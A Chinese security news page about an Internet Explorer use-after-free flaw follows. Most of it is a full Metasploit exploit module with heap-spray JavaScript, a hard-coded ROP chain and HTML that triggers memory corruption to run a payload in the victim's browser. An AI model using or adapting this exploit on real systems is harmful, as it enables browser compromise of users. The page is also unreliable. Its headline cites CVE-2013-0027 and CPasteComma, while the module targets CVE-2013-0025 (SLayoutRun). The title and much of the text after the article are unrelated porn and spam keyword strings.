精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

高危漏洞CVE-2013-0027 EXP 影響IE所有版本

安全 漏洞
Microsoft Internet Explorer處理CPasteComma存在一個釋放后使用錯誤,允許構建惡意WEB頁,誘使用戶解析,可以應用程序上下文執行任意代碼。

Microsoft Internet Explorer處理CPasteComma存在一個釋放后使用錯誤,允許構建惡意WEB頁,誘使用戶解析,可以應用程序上下文執行任意代碼。CVE編號CVE-2013-0027,影響版本如下:

Microsoft Internet Explorer 10

Microsoft Internet Explorer 9

Microsoft Internet Explorer 8

Microsoft Internet Explorer 7

Microsoft Internet Explorer 6

在Metasploit已經發布相應的利用腳本,如下:

  1. ##  
  2. # This file is part of the Metasploit Framework and may be subject to  
  3. # redistribution and commercial restrictions. Please see the Metasploit  
  4. # Framework web site for more information on licensing and terms of use.  
  5. #   http://metasploit.com/framework/  
  6. ##  
  7.    
  8. require 'msf/core' 
  9.    
  10. class Metasploit3 < Msf::Exploit::Remote  
  11.     Rank = NormalRanking  
  12.    
  13.     include Msf::Exploit::Remote::HttpServer::HTML  
  14.     include Msf::Exploit::RopDb  
  15.    
  16.     def initialize(info={})  
  17.         super(update_info(info,  
  18.             'Name'           => "MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free",  
  19.             'Description'    => %q{  
  20.                 This module exploits a use-after-free vulnerability in Microsoft Internet Explorer  
  21.                 where a CParaElement node is released but a reference is still kept  
  22.                 in CDoc. This memory is reused when a CDoc relayout is performed.  
  23.             },  
  24.             'License'        => MSF_LICENSE,  
  25.             'Author'         =>  
  26.                 [  
  27.                     'Scott Bell <scott.bell@security-assessment.com>' # Vulnerability discovery & Metasploit module  
  28.                 ],  
  29.             'References'     =>  
  30.                 [  
  31.                     [ 'CVE''2013-0025' ],  
  32.                     [ 'MSB''MS13-009' ],  
  33.                     [ 'URL''http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ]  
  34.                 ],  
  35.             'Payload'     =>  
  36.                 {  
  37.                     'BadChars'       => "\x00",  
  38.                     'Space'          => 920,  
  39.                     'DisableNops'    => true,  
  40.                     'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500  
  41.                 },  
  42.             'DefaultOptions'  =>  
  43.                 {  
  44.                     'InitialAutoRunScript' => 'migrate -f' 
  45.                 },  
  46.             'Platform'    => 'win',  
  47.             'Targets'     =>  
  48.                 [  
  49.                     [ 'Automatic', {} ],  
  50.                     [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ]  
  51.                 ],  
  52.             'Privileged'      => false,  
  53.             'DisclosureDate'  => "Feb 13 2013",  
  54.             'DefaultTarget'   => 0))  
  55.    
  56.         register_options(  
  57.             [  
  58.                 OptBool.new('OBFUSCATE', [false'Enable JavaScript obfuscation'false])  
  59.             ], self.class)  
  60.    
  61.     end  
  62.    
  63.     def get_target(agent)  
  64.         #If the user is already specified by the user, we'll just use that  
  65.         return target if target.name != 'Automatic' 
  66.    
  67.         nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' 
  68.         ie = agent.scan(/MSIE (\d)/).flatten[0] || '' 
  69.    
  70.         ie_name = "IE #{ie}" 
  71.    
  72.         case nt  
  73.         when '5.1' 
  74.             os_name = 'Windows XP SP3' 
  75.         end  
  76.    
  77.         targets.each do |t|  
  78.             if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))  
  79.                 print_status("Target selected as: #{t.name}")  
  80.                 return t  
  81.             end  
  82.         end  
  83.    
  84.         return nil  
  85.     end  
  86.    
  87.     def heap_spray(my_target, p)  
  88.         js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))  
  89.         js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))  
  90.    
  91.         js = %Q|  
  92.    
  93.             var heap_obj = new heapLib.ie(0x20000);  
  94.             var code = unescape("#{js_code}");  
  95.             var nops = unescape("#{js_nops}");  
  96.             while (nops.length < 0x80000) nops += nops;  
  97.             var offset = nops.substring(0, #{my_target['Offset']});  
  98.             var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);  
  99.             while (shellcode.length < 0x40000) shellcode += shellcode;  
  100.             var block = shellcode.substring(0, (0x80000-6)/2);  
  101.             heap_obj.gc();  
  102.             for (var i=1; i < 0x300; i++) {  
  103.                 heap_obj.alloc(block);  
  104.             }  
  105.             var overflow = nops.substring(0, 10);  
  106.    
  107.         |  
  108.    
  109.         js = heaplib(js, {:noobfu => true})  
  110.    
  111.         if datastore['OBFUSCATE']  
  112.             js = ::Rex::Exploitation::JSObfu.new(js)  
  113.             js.obfuscate  
  114.    
  115.         end  
  116.    
  117.         return js  
  118.     end  
  119.    
  120.     def get_payload(t, cli)  
  121.         code = payload.encoded  
  122.    
  123.         # No rop. Just return the payload.  
  124.         return code if t['Rop'].nil?  
  125.    
  126.         # ROP chain generated by mona.py - See corelan.be  
  127.         case t['Rop']  
  128.         when :msvcrt  
  129.             print_status("Using msvcrt ROP")  
  130.             rop_nops = [0x77c39f92].pack("V") * 11 # RETN  
  131.             rop_payload = generate_rop_payload('msvcrt'"", {'target'=>'xp'})  
  132.             rop_payload << rop_nops  
  133.             rop_payload << [0x77c364d5].pack("V") # POP EBP # RETN  
  134.             rop_payload << [0x77c15ed5].pack("V") # XCHG EAX, ESP # RETN  
  135.             rop_payload << [0x77c35459].pack("V") # PUSH ESP # RETN  
  136.             rop_payload << [0x77c39f92].pack("V") # RETN  
  137.             rop_payload << [0x0c0c0c8c].pack("V") # Shellcode offset  
  138.             rop_payload << code  
  139.         end  
  140.    
  141.         return rop_payload  
  142.     end  
  143.    
  144.     def get_exploit(my_target, cli)  
  145.         p  = get_payload(my_target, cli)  
  146.         js = heap_spray(my_target, p)  
  147.    
  148.         html = %Q|  
  149.         <!doctype html>  
  150.         <html>  
  151.         <head>  
  152.         <script>  
  153.         #{js}  
  154.         </script>  
  155.         <script>  
  156.         var data;  
  157.         var objArray = new Array(1150);  
  158.    
  159.         setTimeout(function(){  
  160.             document.body.style.whiteSpace = "pre-line";  
  161.    
  162.             CollectGarbage();  
  163.    
  164.             for (var i=0;i<1150;i++){  
  165.                 objArray[i] = document.createElement('div');  
  166.                 objArray[i].className = data += unescape("%u0c0c%u0c0c");  
  167.             }  
  168.    
  169.             setTimeout(function(){document.body.innerHTML = "boo"}, 100)  
  170.         }, 100)  
  171.    
  172.         </script>  
  173.         </head>  
  174.         <body>  
  175.         <p> </p>  
  176.         </body>  
  177.         </html>  
  178.         |  
  179.    
  180.         return html  
  181.     end  
  182.    
  183.     def on_request_uri(cli, request)  
  184.         agent = request.headers['User-Agent']  
  185.         uri   = request.uri  
  186.         print_status("Requesting: #{uri}")  
  187.    
  188.         my_target = get_target(agent)  
  189.         # Avoid the attack if no suitable target found  
  190.         if my_target.nil?  
  191.             print_error("Browser not supported, sending 404: #{agent}")  
  192.             send_not_found(cli)  
  193.             return 
  194.         end  
  195.    
  196.         html = get_exploit(my_target, cli)  
  197.         html = html.gsub(/^\t\t/, '')  
  198.         print_status "Sending HTML..." 
  199.         send_response(cli, html, {'Content-Type'=>'text/html'})  
  200.    
  201.     end  
  202.    
  203. end 

微軟安全補丁:https://technet.microsoft.com/en-us/security/bulletin/ms13-009

責任編輯:藍雨淚 來源: FreebuF
相關推薦

2014-11-14 10:24:24

2020-12-11 11:18:43

MiTMKubernetes漏洞

2014-04-29 11:18:27

2015-04-28 07:50:02

2021-11-01 11:59:56

Windows 操作系統漏洞

2015-07-13 09:18:20

2023-06-12 18:55:22

2013-05-06 15:15:23

2022-05-30 12:50:12

微軟Android漏洞

2023-04-04 22:20:53

2020-07-15 10:35:25

漏洞攻擊網絡安全

2016-03-22 12:37:45

Struts2Struts2漏洞漏洞檢測

2015-03-13 18:08:49

2025-03-19 12:57:06

2019-06-14 09:12:46

漏洞代碼攻擊

2017-05-27 10:22:37

2022-12-09 14:32:53

2025-09-16 08:57:44

2013-03-28 11:10:11

2025-09-24 13:49:44

點贊
收藏

51CTO技術棧公眾號

欧美性受xxx黑人xyx性爽| 亚洲一区二区三区三州| 精品久久av| 日本美女视频一区二区| 久久精品成人欧美大片| 999热精品视频| 三妻四妾完整版在线观看电视剧 | 我和岳m愉情xxxⅹ视频| 国产精品高潮久久| 亚洲一区二区三区美女| 日本精品一区二区| 国产精品一区二区人人爽| 国产精品美女久久久浪潮软件| 亚洲一区二区久久久| 天天操精品视频| 美女一区网站| 一区二区三区日韩欧美| 日本一区二区三区免费看| 国产极品久久久| 天堂久久一区二区三区| 欧美激情欧美激情| 久久午夜精品视频| 另类ts人妖一区二区三区| 欧美三日本三级三级在线播放| 国产黄色激情视频| av中文字幕在线| 91毛片在线观看| 91免费国产网站| 国产精品乱子伦| 欧美三级午夜理伦三级中文幕| 在线电影av不卡网址| av无码一区二区三区| 国产999精品在线观看| 色综合咪咪久久| 可以在线看的av网站| 超碰在线观看免费版| 欧美激情一区二区三区| 久久综合九色欧美狠狠| 黄色小视频免费在线观看| 久久99国产精品尤物| 日本一区二区在线播放| 日本三级2019| 在线日韩电影| 欧美激情亚洲另类| 免费一级片视频| 亚洲精品一区二区妖精| 日韩最新中文字幕电影免费看| 波多野结衣一本| 亚洲a级精品| 日韩国产精品视频| 99精品一区二区三区无码吞精| 亚洲2区在线| 日韩片之四级片| 中国老熟女重囗味hdxx| 国产成年精品| 欧美一区二区三区公司| 午夜xxxxx| 国色天香久久精品国产一区| 在线播放中文一区| www.日本久久| 成人免费在线电影网| 日韩欧美123| 国产成人av片| 欧美日韩大片免费观看| 亚洲精品久久久久国产| 中出视频在线观看| 日韩在线影视| 亚洲人成电影网站色| 成人在线一级片| 不卡视频在线| 久久精品国产一区二区电影| 好吊色视频在线观看| 国产一区二区三区四区三区四| 久久91精品国产91久久久| 麻豆91精品91久久久| 精品动漫3d一区二区三区免费| 国模gogo一区二区大胆私拍| 日韩精品久久久久久久酒店| 午夜亚洲一区| 国产日韩精品电影| 国产精品一区二区三区在线免费观看| 国产精品99久久久久| 国产精品免费一区二区| 日韩有码电影| 国产精品网友自拍| 国产对白在线播放| 美女网站视频在线| 色综合激情久久| 日本一二区免费| 伊人久久亚洲| 一区二区欧美激情| 熟女av一区二区| 国精品一区二区| 欧美制服第一页| 国产精品日韩无码| 99精品视频一区二区三区| 日韩免费毛片| 日本在线观看大片免费视频 | 国产一级片免费视频| 黄页视频在线91| 久久国产精品久久| 麻豆影视国产在线观看| 午夜电影一区二区| 日韩av片专区| 欧美禁忌电影| 欧美精品国产精品日韩精品| 97人妻一区二区精品视频| 国产一区 二区 三区一级| 蜜桃精品久久久久久久免费影院| 伦xxxx在线| 色综合av在线| 午夜欧美不卡精品aaaaa| 欧美二区三区在线| 午夜视频在线观看免费视频| 亚洲韩国精品一区| 爱爱爱爱免费视频| 欧美午夜18电影| 美女扒开尿口让男人操亚洲视频网站| 欧美性猛交bbbbb精品| 国产一区二区电影| 日韩欧美精品一区二区三区经典| xxx性欧美| 91麻豆精品国产91久久久久久| 波多野结衣先锋影音| 欧美va天堂| 国产欧美一区二区白浆黑人| 日本黄色三级视频| 亚洲久本草在线中文字幕| 亚洲 欧美 日韩系列| 欧美网色网址| 8x拔播拔播x8国产精品| 成 人片 黄 色 大 片| 国产精品美女久久久久久久网站| 欧美v在线观看| 国产精品玖玖玖在线资源| 久久中文字幕在线| 丰满人妻一区二区三区四区| 97精品视频在线观看自产线路二| 老司机午夜免费福利视频| 日韩福利影视| 伊人一区二区三区久久精品| 久久久久久久久久成人| 久久综合久久99| www.com毛片| 欧洲亚洲视频| 欧美性受xxxx黑人猛交| 亚洲av无码一区二区三区dv| 亚洲靠逼com| 美女日批在线观看| 国产精品va| 不卡视频一区| 91精品久久| 日韩欧美激情四射| 青娱乐免费在线视频| 国产风韵犹存在线视精品| 福利网在线观看| 嫩呦国产一区二区三区av| 操人视频在线观看欧美| 国产免费av观看| 亚洲乱码精品一二三四区日韩在线| 国产女同无遮挡互慰高潮91| 国产三级精品三级在线| 日韩欧美久久| 欧美人与性动交a欧美精品| 亚洲av无码乱码国产麻豆| 亚洲国产中文字幕| 国产黄色三级网站| 久久午夜精品| 一区二区在线高清视频| 国产精品一区三区在线观看| 欧美猛男性生活免费| 黄色一级大片在线免费看国产| 午夜欧美一区二区三区在线播放| 国产ts丝袜人妖系列视频| 久久青草久久| 日日噜噜噜夜夜爽爽| 一区中文字幕电影| 欧美最猛性xxxx| 成年在线电影| 日韩欧美一二三区| 亚洲欧美在线观看视频| 久久色在线观看| 国产福利精品一区二区三区| 国产综合自拍| 色播亚洲婷婷| 亚洲精品v亚洲精品v日韩精品| 久久久亚洲国产| 电影在线高清| 欧美一区二区三区日韩视频| 久久夜靖品2区| 国产精品三级视频| 精品国产乱码久久久久夜深人妻| 美日韩精品视频| 在线观看三级网站| 天海翼亚洲一区二区三区| 国产欧美精品va在线观看| 亚洲精品白浆| 亚洲香蕉av在线一区二区三区| 国产女人爽到高潮a毛片| 图片区日韩欧美亚洲| 日韩欧美在线视频播放| 成人精品国产福利| 小泽玛利亚视频在线观看| 韩日成人在线| 一区二区三区在线观看www| 国产区精品视频在线观看豆花| 国产精品久久久久久久久久99| 免费电影视频在线看| 日韩综合视频在线观看| 欧洲视频在线免费观看| 欧美成人精品福利| 国产99久久久久久免费看| 亚洲一区二区高清| 日本黄色激情视频| 91亚洲永久精品| 久久久久久国产精品日本| 日韩av中文字幕一区二区三区| 日韩极品视频在线观看| 99久久精品网| 日韩理论片在线观看| 日韩a级大片| 国产精品18毛片一区二区| 自拍偷拍欧美日韩| 国产精品精品视频| 91精品论坛| 午夜精品美女自拍福到在线| 老司机午夜在线| 中文字幕久久精品| 日本a一级在线免费播放| 亚洲成人a**站| 国产黄色av网站| 91精品国产综合久久精品性色| 日本视频www色| 91久久精品一区二区| 日本va欧美va国产激情| 亚洲综合色网站| 国产精品九九九九九九| 中文字幕一区二区三区av| 手机毛片在线观看| 久久欧美中文字幕| 欧美丰满少妇人妻精品| 成人av动漫在线| 日本国产在线视频| 成人免费福利片| 99免费观看视频| www.激情成人| 国产精品久久久免费观看| 成人激情av网| 国产伦精品一区二区三区精品| 大尺度一区二区| 人妻体内射精一区二区三区| 成人午夜电影小说| 韩国三级hd两男一女| 成人av在线一区二区三区| 超碰caoprom| www久久久久| 国产又粗又猛又爽视频| 日本一区二区免费在线| 少妇人妻好深好紧精品无码| 中文字幕国产精品一区二区| 激情高潮到大叫狂喷水| 亚洲欧美自拍偷拍| 男的操女的网站| 亚洲一区二区三区中文字幕| 久久高清免费视频| 欧美视频二区36p| а中文在线天堂| 欧美欧美欧美欧美首页| 99久久婷婷国产一区二区三区| 日韩网站在线看片你懂的| 成人午夜精品福利免费| 精品视频久久久久久久| se在线电影| 免费99精品国产自在在线| 成人在线免费观看黄色| 欧美亚洲视频在线看网址| 成人在线免费av| 69堂成人精品视频免费| 色综合久久中文| 亚洲高清在线观看一区| 国产精品久久久久久久免费观看 | 91麻豆桃色免费看| 国产精品任我爽爆在线播放| 欧美专区一二三 | 粗暴蹂躏中文一区二区三区| 久久久123| 国产精品久久久久不卡| 午夜日韩影院| 欧美激情视频一区二区三区| 图片小说视频色综合| 福利视频一区二区三区四区| 日韩制服丝袜av| 国产成人av免费观看| 久久久天堂av| 91视频免费在线看| 在线观看日韩电影| www.激情五月.com| 亚洲天堂日韩电影| 欧美人与性动交α欧美精品图片| 欧洲s码亚洲m码精品一区| 成人免费观看49www在线观看| 精品视频高清无人区区二区三区| 久久国产电影| 精品视频免费在线播放| 久久精品国产99| www.自拍偷拍| 亚洲一区二区四区蜜桃| 伊人影院中文字幕| 日韩av影视综合网| 国产美女福利在线| 国产精品第一视频| 成人在线视频中文字幕| 亚洲日本精品一区| 久久aⅴ乱码一区二区三区| av在线免费观看不卡| 国产精品免费久久| 日韩在线播放中文字幕| 精品91自产拍在线观看一区| 久操视频在线播放| 日本欧美中文字幕| 欧洲vs亚洲vs国产| 免费视频爱爱太爽了| 精品一区二区久久| 先锋影音av在线| 欧美午夜www高清视频| 高清一区二区三区四区| 久久精品国亚洲| 精品久久在线| 青青草国产精品| 美日韩精品视频| 亚洲av无码国产精品久久| 亚洲成人综合视频| 国产91视频在线| 精品国产一区二区三区久久| 99久久伊人| 视频一区视频二区视频三区视频四区国产| 亚洲一区视频| 超碰97在线资源站| 午夜伦欧美伦电影理论片| 亚洲第一页综合| 欧美黑人性猛交| 亚洲三级av| 国产美女作爱全过程免费视频| 国产在线精品免费av| 久久久精品少妇| 3atv在线一区二区三区| 欧美精品hd| 亚洲jizzjizz日本少妇| 影音先锋日韩在线| 人妻巨大乳一二三区| 亚洲精品伦理在线| www.污视频| 韩国三级电影久久久久久| 欧美大片网址| 国产又黄又大又粗视频| 久久夜色精品国产噜噜av| 97久久久久久久| 亚洲色图美腿丝袜| 岛国精品在线| 国产又粗又硬又长| 国产福利精品一区| 国产无遮挡裸体免费视频| 日韩成人性视频| 婷婷综合六月| 伊人精品久久久久7777| 国产福利一区在线观看| 久久精品国产亚洲AV无码麻豆| 亚洲精品动漫100p| 免费电影日韩网站| 亚洲精品一区二区三| 国产乱码精品一品二品| 久久久国产精华液| 日韩国产高清视频在线| 成人免费一区| 在线观看18视频网站| 99久久99久久综合| 天天爱天天做天天爽| 久久精品国产2020观看福利| 日韩三级不卡| 久久久噜噜噜www成人网| 欧美国产国产综合| 国产av无码专区亚洲av麻豆| 7777kkkk成人观看| 日韩av有码| 国产精九九网站漫画| 色综合av在线| a天堂中文在线官网在线| 国产视频一区二区不卡| 蜜桃视频在线一区| 久久久久久久福利| 亚洲男人av在线| 国产区一区二| 国产偷人视频免费| 1区2区3区国产精品| 日韩三级电影网| 亚洲精品欧美日韩专区| 一区二区动漫| 国产大片免费看| 亚洲欧洲av一区二区| 91欧美极品|